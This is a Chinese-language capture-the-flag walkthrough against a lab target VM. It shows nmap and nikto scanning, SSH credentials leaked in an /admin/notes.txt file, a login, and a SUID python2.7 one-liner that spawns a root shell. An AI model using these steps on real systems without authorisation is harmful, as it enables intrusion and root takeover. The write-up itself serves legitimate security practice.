渗透思路:
nmap扫描---->nikto扫描发现可疑目录---->网站文件泄露ssh用户名和密码---->python命令suid提权
环境信息:靶机:192.168.101.67
攻击机:192.168.101.34
具体步骤: 1、nmap扫描sudo nmap -sV -sC -p- 192.168.101.67扫描到22(ssh)、80(http)、111和 49047端口
先看一下80端口,用nikto扫描出了几个目录
nikto -host http://192.168.101.67
其中/admin/目录下有一个notes.txt文件
http://192.168.101.67/admin/
http://192.168.101.67/admin/notes.txt 文件内容如下图所示
从中可以发现用户密码是12345ted123,而用户名没有明确说,从密码可以猜测用户名可能是ted。
以用户名ted,密码12345ted123进行ssh登录,登录成功。
ssh ted@192.168.101.67
靶机上shell上输入如下命令查找有suid的命令
find / -user root -perm /4000 2>/dev/null
其中python2.7命令很可疑,或许可以用来提权。
在GTFOBins网站上找到python命令的suid提权方法如下图所示
python | GTFOBins
但是GTFOBins上的提权方法直接执行会失败,改成下面这样执行(也就是sh改成bash),成功提权到root
python2.7 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
在/root/目录下找到flag.txt
